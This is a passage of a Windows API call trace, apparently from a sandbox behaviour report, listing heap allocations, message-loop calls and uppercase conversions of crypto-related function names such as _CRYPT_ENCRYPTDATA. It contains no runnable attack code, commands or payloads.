hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0182.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0182.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0182.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4066) returned 0xe53020 [0182.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf6d020 | out: hHeap=0x970000) returned 1 [0182.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0182.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0182.755] TranslateMessage (lpMsg=0x8cf708) returned 0 [0182.755] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0182.755] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0182.755] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0182.759] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0182.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0182.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0182.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0182.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0182.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4066) returned 0xf27020 [0182.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0182.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf27020 | out: hHeap=0x970000) returned 1 [0182.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0182.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0182.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0182.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0182.779] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0182.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0182.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0182.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0182.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0182.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0182.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0182.779] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0182.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0182.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0182.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0182.779] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0182.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0182.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0182.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0182.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0182.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0182.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0182.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0182.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0182.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4066) returned 0xf21020 [0182.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0182.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0182.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0182.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0182.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4066) returned 0xff4020 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0182.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0182.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0182.903] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0182.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0182.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0182.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0182.904] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0182.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0182.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0182.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0182.904] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0182.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0182.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0182.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0182.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0182.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0182.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0182.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0182.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0182.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0182.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0182.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0182.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0182.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0182.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0182.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0182.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0182.906] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0182.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0182.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0182.906] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0182.906] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0182.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0182.906] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0182.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0182.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0182.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0182.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0182.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0182.907] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0182.907] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0182.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0182.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0182.907] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0182.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0182.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0182.907] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0182.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0182.907] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0182.907] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0182.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0182.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0182.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0182.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0182.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0182.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0182.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0182.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0182.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0182.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0182.908] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0182.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0182.908] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0182.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0182.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0182.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0182.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0182.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0182.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0182.909] 